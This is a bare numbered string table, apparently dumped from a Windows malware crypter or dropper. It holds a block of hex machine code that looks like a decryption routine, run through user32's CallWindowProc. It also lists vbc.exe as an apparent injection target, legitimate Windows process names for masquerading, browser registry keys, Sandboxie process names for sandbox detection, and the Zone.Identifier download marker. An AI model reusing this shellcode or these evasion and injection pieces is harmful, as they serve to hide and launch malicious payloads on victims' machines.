26=0xC81001006A006A005356578B551031C989C84989D7F2AE484829C88945F085C00F84DC000000B90001000088C82C0188840DEFFEFFFFE2F38365F4008365FC00817DFC000100007D478B45FC31D2F775F0920345100FB6008B4DFC0FB68C0DF0FEFFFF01C80345F425FF0000008945F48B75FC8A8435F0FEFFFF8B7DF486843DF0FEFFFF888435F0FEFFFFFF45FCEBB08D9DF0FEFFFF31FF89FA39550C76638B85ECFEFFFF4025FF0000008985ECFEFFFF89D80385ECFEFFFF0FB6000385E8FEFFFF25FF0000008985E8FEFFFF89DE03B5ECFEFFFF8A0689DF03BDE8FEFFFF860788060FB60E0FB60701C181E1FF0000008A840DF0FEFFFF8B750801D6300642EB985F5E5BC9C21000
27=user32.dll
28=CallWindowProc
29=none
30=byte[
31=msmsgs.exe
32=reader_sl.exe
33=alg.exe
34=wscntfy.exe
35=HKEY_CLASSES_ROOT\http\shell\open\command
36=HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
37=HKEY_CLASSES_ROOT\shell\open\command
38=\Microsoft.NET\Framework\
39=\vbc.exe
40=[\\/:><\|]|(?s)^\s*$
41=[\\/]+$
42=SandboxieRpcSs.exe
43=SandboxieDcomLaunch.exe
44=:Zone.Identifier:
45=DATA
|
